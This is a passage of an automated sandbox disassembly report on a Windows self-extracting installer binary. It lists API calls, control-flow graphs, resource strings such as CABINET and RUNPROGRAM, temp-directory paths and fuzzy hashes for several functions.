                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 003E57EF
                                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 003E5802
                                                                                                                                                                                                                                                              • Part of subcall function 003E2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 003E2654
                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 003E5830
                                                                                                                                                                                                                                                              • Part of subcall function 003E6517: FindResourceA.KERNEL32(003E0000,000007D6,00000005), ref: 003E652A
                                                                                                                                                                                                                                                              • Part of subcall function 003E6517: LoadResource.KERNEL32(003E0000,00000000,?,?,003E2EE8,00000000,003E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 003E6538
                                                                                                                                                                                                                                                              • Part of subcall function 003E6517: DialogBoxIndirectParamA.USER32(003E0000,00000000,00000547,003E19E0,00000000), ref: 003E6557
                                                                                                                                                                                                                                                              • Part of subcall function 003E6517: FreeResource.KERNEL32(00000000,?,?,003E2EE8,00000000,003E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 003E6560
                                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 003E5878
                                                                                                                                                                                                                                                              • Part of subcall function 003E597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003E59A8
                                                                                                                                                                                                                                                              • Part of subcall function 003E597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 003E59AF
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                                            • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                                            • API String ID: 2436801531-2610921595
                                                                                                                                                                                                                                                            • Opcode ID: dd5e0a30e50dee002daf1b73ec3498b129345610714cd192a81e509fb0ed6ae3
                                                                                                                                                                                                                                                            • Instruction ID: 0c020db2d88280737701a8471d4d5b1b2b62958cdb55b86c6960862645f0710a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd5e0a30e50dee002daf1b73ec3498b129345610714cd192a81e509fb0ed6ae3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2812C70B04AF89ADB33AB338C85BEE765D9B65348F010365F586DA1D1DFB09EC18A50
                                                                                                                                                                                                                                                            Function 003E2CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183synchronizationCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 324 3e2caa-3e2d1c memset * 3 call 3e468f 327 3e2d22-3e2d27 324->327 328 3e2ef3 324->328 327->328 329 3e2d2d-3e2d59 CreateEventA SetEvent call 3e468f 327->329 330 3e2ef8-3e2f01 call 3e44b9 328->330 335 3e2d7d-3e2d84 329->335 336 3e2d5b-3e2d78 call 3e44b9 329->336 334 3e2f06 330->334 337 3e2f08-3e2f18 call 3e6ce0 334->337 339 3e2e1f-3e2e2e call 3e5c9e 335->339 340 3e2d8a-3e2da1 call 3e468f 335->340 336->334 348 3e2e3a-3e2e41 339->348 349 3e2e30-3e2e35 339->349 340->336 350 3e2da3-3e2dbb CreateMutexA 340->350 351 3e2e52-3e2e62 FindResourceA 348->351 352 3e2e43-3e2e4d call 3e2390 348->352 349->330 350->339 353 3e2dbd-3e2dc8 GetLastError 350->353 355 3e2e6e-3e2e75 351->355 356 3e2e64-3e2e6c LoadResource 351->356 352->334 353->339 354 3e2dca-3e2dd3 353->354 358 3e2dea-3e2e02 call 3e44b9 354->358 359 3e2dd5-3e2de8 call 3e44b9 354->359 360 3e2e7d-3e2e84 355->360 361 3e2e77 355->361 356->355 358->339 370 3e2e04-3e2e1a CloseHandle 358->370 359->370 365 3e2e8b-3e2e94 call 3e36ee 360->365 366 3e2e86-3e2e89 360->366 361->360 365->334 372 3e2e96-3e2ea2 365->372 366->337 370->334 373 3e2ea4-3e2ea8 372->373 374 3e2eb0-3e2eba 372->374 373->374 375 3e2eaa-3e2eae 373->375 376 3e2eef-3e2ef1 374->376 377 3e2ebc-3e2ec3 374->377 375->374 375->376 376->337 377->376 378 3e2ec5-3e2ecc call 3e18a3 377->378 378->376 381 3e2ece-3e2eed call 3e6517 378->381 381->334 381->376
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 003E2CD9
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 003E2CE9
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 003E2CF9
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E2D34
                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 003E2D40
                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 003E2DAE
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 003E2DBD
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(valid,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 003E2E0A
                                                                                                                                                                                                                                                              • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                                                                              • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 003E4554
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                                            • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$valid
                                                                                                                                                                                                                                                            • API String ID: 1002816675-2613340241
                                                                                                                                                                                                                                                            • Opcode ID: f1f38e4919b945b3dd90b0faf3a5cf44007d8638fceb63b7f2f69953c5133e5c
                                                                                                                                                                                                                                                            • Instruction ID: 8b7a3069b3abacada9e2d811182e0a48f07a53a649a4a7d927f09baafbf79fee
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f1f38e4919b945b3dd90b0faf3a5cf44007d8638fceb63b7f2f69953c5133e5c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC51B4707403F1AAE737AB239C8ABBB269CDB85700F01473AFA45DD2D1DAB49C419711
                                                                                                                                                                                                                                                            Function 003E4FE0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 384 3e4fe0-3e501a call 3e468f FindResourceA LoadResource LockResource 387 3e5020-3e5027 384->387 388 3e5161-3e5163 384->388 389 3e5029-3e5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 387->389 390 3e5057-3e505e call 3e4efd 387->390 389->390 393 3e507c-3e50b4 390->393 394 3e5060-3e5077 call 3e44b9 390->394 399 3e50e8-3e5104 call 3e44b9 393->399 400 3e50b6-3e50da 393->400 398 3e5107-3e510e 394->398 401 3e511d-3e511f 398->401 402 3e5110-3e5117 FreeResource 398->402 412 3e5106 399->412 411 3e50dc 400->411 400->412 404 3e513a-3e5141 401->404 405 3e5121-3e5127 401->405 402->401 409 3e515f 404->409 410 3e5143-3e514a 404->410 405->404 408 3e5129-3e5135 call 3e44b9 405->408 408->404 409->388 410->409 414 3e514c-3e5159 SendMessageA 410->414 415 3e50e3-3e50e6 411->415 412->398 414->409 415->399 415->412
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                                                                              • Part of subcall function 003E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 003E4FFE
                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 003E5006
                                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 003E500D
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000000,00000842), ref: 003E5030
                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 003E5037
                                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000841,00000005), ref: 003E504A
                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 003E5051
                                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 003E5111
                                                                                                                                                                                                                                                            • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 003E5159
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                                            • String ID: *MEMCAB$CABINET$zI6
                                                                                                                                                                                                                                                            • API String ID: 1305606123-1641303110
                                                                                                                                                                                                                                                            • Opcode ID: 8cd7db80db35522845e11337c8a4f48b59d55971cc7ecf1dcee0f4760a8ccfeb
                                                                                                                                                                                                                                                            • Instruction ID: 085fc155c1c6a5119b4861e46c9a457e11bf00f553fbf1b54deffdafdc7483e7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8cd7db80db35522845e11337c8a4f48b59d55971cc7ecf1dcee0f4760a8ccfeb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D23128B0B407E6BBDB335B63ADC9FA7369CA708759F050725F905AE2D1CAB49C008760
                                                                                                                                                                                                                                                            Function 003E597D Relevance: 19.7, APIs: 13, Instructions: 212windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 416 3e597d-3e59b9 GetCurrentDirectoryA SetCurrentDirectoryA 417 3e59dd-3e5a1b GetDiskFreeSpaceA 416->417 418 3e59bb-3e59d8 call 3e44b9 call 3e6285 416->418 419 3e5ba1-3e5bde memset call 3e6285 GetLastError FormatMessageA 417->419 420 3e5a21-3e5a4a MulDiv 417->420 433 3e5c05-3e5c14 call 3e6ce0 418->433 430 3e5be3-3e5bfc call 3e44b9 SetCurrentDirectoryA 419->430 420->419 423 3e5a50-3e5a6c GetVolumeInformationA 420->423 426 3e5a6e-3e5ab0 memset call 3e6285 GetLastError FormatMessageA 423->426 427 3e5ab5-3e5aca SetCurrentDirectoryA 423->427 426->430 432 3e5acc-3e5ad1 427->432 443 3e5c02 430->443 436 3e5ae2-3e5ae4 432->436 437 3e5ad3-3e5ad8 432->437 441 3e5ae6 436->441 442 3e5ae7-3e5af8 436->442 437->436 439 3e5ada-3e5ae0 437->439 439->432 439->436 441->442 445 3e5af9-3e5afb 442->445 446 3e5c04 443->446 447 3e5afd-3e5b03 445->447 448 3e5b05-3e5b08 445->448 446->433 447->445 447->448 449 3e5b0a-3e5b1b call 3e44b9 448->449 450 3e5b20-3e5b27 448->450 449->443 452 3e5b29-3e5b33 450->452 453 3e5b52-3e5b5b 450->453 452->453 455 3e5b35-3e5b50 452->455 456 3e5b62-3e5b6d 453->456 455->456 457 3e5b6f-3e5b74 456->457 458 3e5b76-3e5b7d 456->458 459 3e5b85 457->459 460 3e5b7f-3e5b81 458->460 461 3e5b83 458->461 462 3e5b96-3e5b9f 459->462 463 3e5b87-3e5b94 call 3e268b 459->463 460->459 461->459 462->446 463->446
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003E59A8
                                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(?), ref: 003E59AF
                                                                                                                                                                                                                                                            • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 003E5A13
                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,00000400), ref: 003E5A40
                                                                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 003E5A64
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 003E5A7C
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 003E5A98
                                                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 003E5AA5
                                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 003E5BFC
                                                                                                                                                                                                                                                              • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                                                                              • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 003E4554
                                                                                                                                                                                                                                                              • Part of subcall function 003E6285: GetLastError.KERNEL32(003E5BBC), ref: 003E6285
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4237285672-0
                                                                                                                                                                                                                                                            • Opcode ID: 711845923615a7ea769d85478de845911f5c70f7252e7359ff1b8d9c460f5901
                                                                                                                                                                                                                                                            • Instruction ID: 59d3013c3e3d58d412669bc0f212e54c9aae8590eca204709f0d0376b6df108c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 711845923615a7ea769d85478de845911f5c70f7252e7359ff1b8d9c460f5901
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF7185B19006AD9FDB27DB61CCC5BFB77ADEB48344F1446A9F5059A1C0DA309E848B60
                                                                                                                                                                                                                                                            Function 003E53A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 003E171E: _vsnprintf.MSVCRT ref: 003E1750
                                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 003E53FB
                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 003E5402
                                                                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 003E541F
                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 003E542B
                                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 003E5434
                                                                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 003E5452
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                                            • API String ID: 1082909758-7194216
                                                                                                                                                                                                                                                            • Opcode ID: 394f549a41742a626ee61090cf377cd3725285a29719c3fe382df6958aaaab0a
                                                                                                                                                                                                                                                            • Instruction ID: 78a333af42f872478b48822212549818144e577adb53772bea7051b4226d3ab0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 394f549a41742a626ee61090cf377cd3725285a29719c3fe382df6958aaaab0a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F61104717009A467D322AB279C89FEF366DEBD1725F000325F546DA1D0CE749D868AA1
                                                                                                                                                                                                                                                            Function 003E468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 538 3e468f-3e46b4 FindResourceA SizeofResource 539 3e46fb-3e46ff 538->539 540 3e46b6-3e46b8 538->540 540->539 541 3e46ba-3e46bc 540->541 542 3e46be-3e46dd FindResourceA LoadResource LockResource 541->542 543 3e46f9 541->543 542->543 544 3e46df-3e46f7 memcpy_s FreeResource 542->544 543->539 544->539
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                                                                            • memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.1964645270.00000000003E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964621928.00000000003E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964669029.00000000003E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.1964691169.00000000003EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_3e0000_P0D95.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                                                                            • String ID: TITLE$valid
                                                                                                                                                                                                                                                            • API String ID: 3370778649-1357392868
                                                                                                                                                                                                                                                            • Opcode ID: b0314a63322fca406ef2265118821ca9e7bf1caa78e3fefa268a4692ddaf0989
                                                                                                                                                                                                                                                            • Instruction ID: b403c065b10f6c4f6d200a1d7f35844cf058d2b2418c14e79f7f44d91c6fd48c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0314a63322fca406ef2265118821ca9e7bf1caa78e3fefa268a4692ddaf0989
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9701F9362407907BE3321BA65C8CF2B3E2CDBCAF62F054214FA49AB1C0C9719C4082B2
                                                                                                                                                                                                                                                            Function 003E5467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 545 3e5467-3e5484 546 3e551c-3e5528 call 3e1680 545->546 547 3e548a-3e5490 call 3e53a1 545->547 550 3e552d-3e5539 call 3e58c8 546->550 551 3e5495-3e5497 547->551 560 3e554d-3e5552 550->560 561 3e553b-3e5545 CreateDirectoryA 550->561 553 3e549d-3e54c0 call 3e1781 551->553 554 3e5581-3e5583 551->554 562 3e550c-3e551a call 3e658a 553->562 563 3e54c2-3e54d8 GetSystemInfo 553->563 557 3e558d-3e559d call 3e6ce0 554->557 567 3e5554-3e5557 call 3e597d 560->567 568 3e5585-3e558b 560->568 565 3e5577-3e557c call 3e6285 561->565 566 3e5547 561->566 562->550 569 3e54fe 563->569 570 3e54da-3e54dd 563->570 565->554 566->560 576 3e555c-3e555e 567->576 568->557 577 3e5503-3e5507 call 3e658a 569->577 574 3e54df-3e54e2 570->574 575 3e54f7-3e54fc 570->575 580 3e54e4-3e54e7 574->580 581 3e54f0-3e54f5 574->581 575->577 576->568 582 3e5560-3e5566 576->582 577->562 580->562 584 3e54e9-3e54ee 580->584 581->577 582->554 585 3e5568-3e5575 RemoveDirectoryA 582->585 584->577 585->554
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 003E54C9
                                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 003E553D
                                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 003E556F
                                                                                                                                                                                                                                                              • Part of subcall function 003E53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 003E53FB
